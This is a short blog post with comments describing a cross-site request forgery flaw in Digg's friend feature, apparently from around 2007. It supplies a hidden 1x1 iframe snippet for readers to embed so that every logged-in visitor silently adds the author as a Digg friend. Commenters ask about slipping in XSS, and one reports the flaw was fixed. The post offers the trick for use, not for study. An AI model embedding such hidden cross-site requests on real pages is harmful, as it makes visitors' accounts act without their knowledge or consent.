Digg Friend Exploit

Published
by
busin3ss
1 year, 4 months ago
in Uncategorized
. Tags: , .

I’ve just found this here.

In what has got to be the stupidest move in the history of community features, Digg has created a URL-powered friend-adder. Basically, all you have to do is visit the url http://digg.com/invitefrom/{username} such as http://digg.com/invitefrom/russvirante and you automatically add them as your friend if you are currently logged in to Digg.

Add this to your site, and you will automatically add as your friend everyone who visits your site. Remember to change the last part for your Digg username.

1

<iframe height="1" width="1" src="http://digg.com/invitefrom/{username}"></iframe>

5 Responses to “Digg Friend Exploit”

Feed for this Entry Trackback Address
  1. 1 hackathology
    1 year, 4 months ago. Quote

    ah….thats bad from Digg. Besides this username exploit,
    can you insert a small XSS script in it?

  2. 2 hackathology
    1 year, 4 months ago. Quote

    Nice find, besides this username thing, is it possible to
    insert a small snippet of XSS script inside?

  3. 3 Nick
    1 year, 4 months ago. Quote

    They fixed this. It now requires you to confirm that you want to add them as a friend. Fun while it lasted :)

  1. 1 Best Way To Use Digg - WickedFire - Affiliate Marketing Forum - Internet Marketing Webmaster SEO Forum
    Pingback on Apr 7th, 2007 at 2:22 am
  2. 2 Will you be my friend? - WickedFire - Affiliate Marketing Forum - Internet Marketing Webmaster SEO Forum
    Pingback on May 3rd, 2007 at 11:07 pm

Leave a Reply

Quote selected text